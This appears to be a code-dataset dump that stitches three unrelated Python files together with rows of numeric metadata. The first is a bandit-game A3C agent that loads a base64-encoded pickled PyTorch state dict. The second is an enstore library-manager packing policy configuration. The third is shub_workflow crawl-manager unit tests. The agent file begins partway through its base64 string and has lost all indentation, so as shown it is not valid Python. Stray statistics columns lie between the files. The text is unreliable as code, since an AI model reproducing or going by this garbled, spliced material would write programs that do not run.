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'
import base64
import pickle
import torch
from torch import distributions, nn
import torch.nn.functional as F
class FullyConnectedGNNLayer(nn.Module):
def __init__(self, n_nodes, in_features, out_features, activation_func=nn.ReLU(), squeeze_out=False):
super().__init__()
self.n_nodes = n_nodes
self.activation_func = activation_func
self.transform_features = nn.Linear(in_features, out_features)
self.message_passing_mat = nn.Parameter(
(torch.ones((n_nodes, n_nodes)) - torch.eye(n_nodes)) / (n_nodes - 1),
requires_grad=False
)
self.recombine_features = nn.Linear(out_features*2, out_features)
self.squeeze_out = squeeze_out
# Initialize linear layer weights
nn.init.normal_(self.transform_features.weight, mean=0., std=0.2)
nn.init.normal_(self.recombine_features.weight, mean=0., std=0.2)
nn.init.constant_(self.transform_features.bias, 0.)
nn.init.constant_(self.recombine_features.bias, 0.)
def forward(self, features):
features_transformed = self.activation_func(
self.transform_features(features)
)
messages = torch.matmul(self.message_passing_mat, features_transformed)
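        # message_passing_mat is (1 - I) / (n_nodes - 1), so each row of `messages` is the mean of the other nodes' transformed features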
features_messages_combined = self.activation_func(
self.recombine_features(torch.cat([features_transformed, messages], dim=-1))
)
if self.squeeze_out:
return features_messages_combined.squeeze(dim=-1)
else:
return features_messages_combined
class GraphNN_A3C(nn.Module):
def __init__(self, in_features, n_nodes, n_hidden_layers, layer_sizes,
activation_func = nn.ReLU()):
super().__init__()
# Define network
if type(layer_sizes) == int:
layer_sizes = [layer_sizes] * (n_hidden_layers + 1)
assert len(layer_sizes) == n_hidden_layers + 1, f'len(layer_sizes) must equal n_hidden_layers + 1, was {len(layer_sizes)} but should have been {n_hidden_layers+1}'
layers = [FullyConnectedGNNLayer(n_nodes, in_features, layer_sizes[0], activation_func=activation_func)]
for i in range(n_hidden_layers):
layers.append(FullyConnectedGNNLayer(n_nodes, layer_sizes[i], layer_sizes[i+1], activation_func=activation_func))
self.base = nn.Sequential(*layers)
self.actor = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=activation_func, squeeze_out=True)
self.critic = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=nn.Identity(), squeeze_out=True)
def forward(self, states):
base_out = self.base(states)
return self.actor(base_out), self.critic(base_out).mean(dim=-1)
def sample_action(self, states):
with torch.no_grad():
logits, _ = self.forward(states)
probs = F.softmax(logits, dim=-1)
batch_size, n_envs, n_players, n_bandits = probs.shape
m = torch.distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits))
return m.sample().view(batch_size, n_envs, n_players)
def choose_best_action(self, states):
with torch.no_grad():
logits, _ = self.forward(states)
return logits.argmax(dim=-1)
def loss_func(self, states, actions, v_t):
#print(f'states.shape: {states.shape}, actions.shape: {actions.shape}, v_t.shape: {v_t.shape}')
logits, values = self.forward(states)
#print(f'logits.shape: {logits.shape}, values.shape: {values.shape}')
td = v_t - values
critic_loss = td.pow(2).view(-1)
probs = F.softmax(logits, dim=-1)
batch_size, n_envs, n_players, n_bandits = probs.shape
m = torch.distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits))
#print(f'm.log_prob(actions.view(batch_size * n_envs * n_players)).shape: {m.log_prob(actions.view(batch_size * n_envs * n_players)).shape}, td.shape: {td.shape}')
actor_loss = -(m.log_prob(actions.view(-1)) * td.detach().view(-1))
total_loss = (critic_loss + actor_loss).mean()
return total_loss
class A3C_Agent():
def __init__(self, configuration, serialized_string):
self.n_bandits = configuration.banditCount
self.n_steps = 1999 # TODO: Get this info from configuration somehow?
self.total_reward = 0
self.pull_rewards = torch.zeros((self.n_bandits, 1), dtype=torch.float)
self.player_n_pulls = torch.zeros((self.n_bandits, 2), dtype=torch.float)
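        # pull_rewards: cumulative reward per bandit from our own pulls; player_n_pulls: per-bandit pull counts for [self, opponent]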
state_dict_bytes = base64.b64decode(serialized_string)
state_dicts = pickle.loads(state_dict_bytes)
self.model = GraphNN_A3C(
in_features=3,
n_nodes=self.n_bandits,
n_hidden_layers=3,
layer_sizes=16
)
self.model.load_state_dict(state_dicts['model_state_dict'])
self.model.eval()
def get_obs(self):
        # Obs must be of shape (n_batches, n_envs, n_players, n_bandits, n_features)
# Since we are only selecting an action for a single agent, this translates to: (1, 1, 1, n_bandits, -1)
return torch.cat([
self.player_n_pulls,
self.pull_rewards
], dim=-1).view(1, 1, 1, self.n_bandits, -1) * self.n_bandits / self.n_steps
def get_action(self, observation):
if observation.step > 0:
            # Reward gained since the last step (observation.reward is cumulative)
r = observation.reward - self.total_reward
self.total_reward = observation.reward
# Update pull_rewards and player_n_pulls
            opp_last_act = observation.lastActions[not observation.agentIndex]  # `not agentIndex` flips 0/1 to index the opponent
self.pull_rewards[self.last_act] += r
self.player_n_pulls[self.last_act, 0] += 1
self.player_n_pulls[opp_last_act, 1] += 1
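        # Query the trained model for the best arm given the updated statistics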
self.last_act = self.model.choose_best_action(self.get_obs()).item()
return self.last_act
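# Module-level agent instance, created lazily on the first call so the model is only deserialized once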
curr_agent = None
def agent(observation, configuration):
global curr_agent
if curr_agent is None:
curr_agent = A3C_Agent(configuration, serialized_string)
return curr_agent.get_action(observation)
| 2,466.165517
| 351,299
| 0.93574
| 21,579
| 357,594
| 15.495806
| 0.051578
| 1.669817
| 2.424787
| 3.126465
| 0.900542
| 0.899615
| 0.899277
| 0.8992
| 0.8992
| 0.898697
| 0
| 0.179653
| 0.004248
| 357,594
| 144
| 351,300
| 2,483.291667
| 0.75943
| 0.00179
| 0
| 0.110092
| 0
| 0.018349
| 0.984482
| 0.984124
| 0
| 1
| 0
| 0.006944
| 0.009174
| 1
| 0.100917
| false
| 0.018349
| 0.045872
| 0.009174
| 0.256881
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
f7c9416a6e465da655208b7268be6e523a26f03b
| 25,501
|
py
|
Python
|
etc/stken_policy.py
|
moibenko/enstore
|
6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9
|
[
"Intel",
"Unlicense"
] | 4
|
2021-10-17T11:17:59.000Z
|
2022-02-28T16:58:40.000Z
|
etc/stken_policy.py
|
moibenko/enstore
|
6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9
|
[
"Intel",
"Unlicense"
] | 17
|
2021-10-05T21:44:06.000Z
|
2022-03-31T16:58:40.000Z
|
etc/stken_policy.py
|
moibenko/enstore
|
6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9
|
[
"Intel",
"Unlicense"
] | 8
|
2021-09-02T18:55:49.000Z
|
2022-03-09T21:05:28.000Z
|
# This file contains library manager director policies
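# Keys are library manager names; each numbered policy maps a matching 'rule' (storage_group, file_family, wrapper)
# to packaging parameters (minimal_file_size, resulting_library, max_files_in_pack, max_waiting_time).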
policydict = {
'CD-10KCF1.library_manager': {
1: {'rule': {'storage_group': 'lqcd',
'file_family': 'hpqcd',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
2: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-charmonium',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library': 'CD-DiskSF1',
'max_files_in_pack': 10000,
'max_waiting_time': 86400,
},
3: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-charmonium',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library': 'CD-DiskSF1',
'max_files_in_pack': 10000,
'max_waiting_time': 86400,
},
4: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-l6496f21b7075m00155m031',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
5: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-l6496f21b7075m00155m031',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
6: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-HISQ',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
7: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-FNAL-HISQ',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
8: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-hotqcdhisq',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
9: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-hotqcdhisq',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
10: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-nHYPBSM',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 12*3600,
},
11: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-pndme',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 12*3600,
},
12: {'rule': {'storage_group': 'nova',
'file_family': 'montecarlo',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
13: {'rule': {'storage_group': 'nova',
'file_family': 'rawdata_FarDet',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
14: {'rule': {'storage_group': 'nova',
'file_family': 'rawdata_NDOS_unmerged',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
15: {'rule': {'storage_group': 'nova',
'file_family': 'reco_NDOS',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
16: {'rule': {'storage_group': 'scene',
'file_family': 'scene',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 65,
'max_waiting_time': 24*3600,
},
},
'CD-LTO4F1.library_manager': {
1: {'rule': {'storage_group': 'argoneut',
'file_family': 'rawdata',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 1100,
'max_waiting_time': 24*3600,
},
2: {'rule': {'storage_group': 'argoneut',
'file_family': 'root_files',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 100,
'max_waiting_time': 24*3600,
},
3: {'rule': {'storage_group': 'minerva',
'file_family': 'binary-raw-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
4: {'rule': {'storage_group': 'minerva',
'file_family': 'calibrated-pool-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
5: {'rule': {'storage_group': 'minerva',
'file_family': 'rawdigits-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
6: {'rule': {'storage_group': 'minerva',
'file_family': 'reconstructed-pool-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
7: {'rule': {'storage_group': 'minerva',
'file_family': 'supdigits-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 3600,
},
8: {'rule': {'storage_group': 'minerva',
'file_family': 'data_dst',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
9: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
10: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing_cal',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
11: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing_rawdigits',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
12: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing_sup',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
13: {'rule': {'storage_group': 'minerva',
'file_family': 'data_reconstructed',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
14: {'rule': {'storage_group': 'minerva',
'file_family': 'data_results',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
15: {'rule': {'storage_group': 'minerva',
'file_family': 'rawdata',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
20: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_processing_cal',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
21: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_reconstructed',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 15,
'max_waiting_time': 24*3600,
},
22: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_results',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
23: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_dst',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 150,
'max_waiting_time': 24*3600,
},
24: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_generation',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 1000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 2500,
'max_waiting_time': 24*3600,
},
25: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_minos',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
},
'CD-LTO4F1T.library_manager': {
2: {'rule': {'storage_group': 'ssa_test',
'file_family': 'ssa_test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'max_files_in_pack': 100,
'max_waiting_time': 120,
'resulting_library':'CD-DiskSFT'
}
},
'CD-LTO4GST.library_manager': {
1: {'rule': {'storage_group': 'ssa_test',
'file_family': 'ssa_test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'max_files_in_pack': 100,
'max_waiting_time': 120,
'resulting_library':'CD-DiskSF1T'
}
},
}
| 69.865753
| 107
| 0.248931
| 1,199
| 25,501
| 4.914929
| 0.092577
| 0.072798
| 0.105888
| 0.092652
| 0.943153
| 0.928559
| 0.863058
| 0.793653
| 0.756151
| 0.698456
| 0
| 0.103336
| 0.675542
| 25,501
| 364
| 108
| 70.057692
| 0.608895
| 0.002039
| 0
| 0.551247
| 0
| 0
| 0.217079
| 0.009313
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f7d4b776c9ad3dbb353aa31ac1170b96958352f6
| 10,931
|
py
|
Python
|
tests/test_crawl_manager.py
|
curita/shub-workflow
|
5450da1502f8c300be242609dc6ae67bd3702079
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_crawl_manager.py
|
curita/shub-workflow
|
5450da1502f8c300be242609dc6ae67bd3702079
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_crawl_manager.py
|
curita/shub-workflow
|
5450da1502f8c300be242609dc6ae67bd3702079
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from unittest import TestCase
from unittest.mock import patch, Mock
from shub_workflow.crawl import CrawlManager, PeriodicCrawlManager, GeneratorCrawlManager
from .utils.contexts import script_args
class TestManager(CrawlManager):
name = "test"
class PeriodicTestManager(PeriodicCrawlManager):
name = "test"
class ListTestManager(GeneratorCrawlManager):
name = "test"
default_max_jobs = 2
def set_parameters_gen(self):
parameters_list = [
{"argA": "valA"},
{"argA": "valB"},
{"argB": "valC"},
]
for args in parameters_list:
yield args
class TestManagerWithSpider(CrawlManager):
name = "test"
spider = "myimplicitspider"
class CrawlManagerTest(TestCase):
def setUp(self):
os.environ["SH_APIKEY"] = "ffff"
os.environ["PROJECT_ID"] = "999"
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = TestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
# second loop: spider still running. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# third loop: spider is finished. Stop.
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
mocked_super_schedule_spider.reset_mock()
result = manager.workflow_loop()
self.assertFalse(result)
self.assertFalse(mocked_super_schedule_spider.called)
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_implicit_spider(self, mocked_super_schedule_spider):
with script_args([]):
manager = TestManagerWithSpider()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myimplicitspider", units=None, job_settings={})
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_badoutcome(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = TestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
# second loop: spider still running. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# third loop: spider is finished. Stop.
manager.is_finished = lambda x: "cancelled" if x == "999/1/1" else None
mocked_super_schedule_spider.reset_mock()
result = manager.workflow_loop()
self.assertFalse(result)
self.assertFalse(mocked_super_schedule_spider.called)
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_with_resume(self, mocked_super_schedule_spider):
with script_args(["myspider", "--flow-id=3a20", "--resume-workflow"]):
manager = TestManager()
manager.get_owned_jobs = Mock()
manager.get_owned_jobs.side_effect = [[{"key": "999/1/1"}]]
manager._WorkFlowManager__on_start()
self.assertEqual(manager.get_owned_jobs.call_count, 1)
# first loop: spider still running in workflow. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# second loop: spider is finished. Stop.
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
result = manager.workflow_loop()
self.assertFalse(result)
self.assertFalse(mocked_super_schedule_spider.called)
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_periodic(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = PeriodicTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
# second loop: spider still running. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# third loop: spider is finished. Schedule again.
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
mocked_super_schedule_spider.reset_mock()
mocked_super_schedule_spider.side_effect = ["999/1/2"]
result = manager.workflow_loop()
self.assertTrue(result)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
            # fourth loop: spider is cancelled. Schedule again.
manager.is_finished = lambda x: "cancelled" if x == "999/1/2" else None
mocked_super_schedule_spider.reset_mock()
mocked_super_schedule_spider.side_effect = ["999/1/3"]
result = manager.workflow_loop()
self.assertTrue(result)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_list(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = ListTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1", "999/1/2", "999/1/3"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider with first set of arguments
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 2)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argA="valA", job_settings={})
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argA="valB", job_settings={})
# second loop: still no job finished. Wait for a free slot
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 2)
            # third loop: one job finished. We can schedule the last one with the third set of arguments
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argB="valC", job_settings={})
            # fourth loop: waiting for jobs to finish
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
# fifth loop: second job finished
manager.is_finished = lambda x: "cancelled" if x == "999/1/2" else None
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
# sixth loop: last job finished. Exit
manager.is_finished = lambda x: "finished" if x == "999/1/3" else None
result = manager.workflow_loop()
self.assertFalse(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
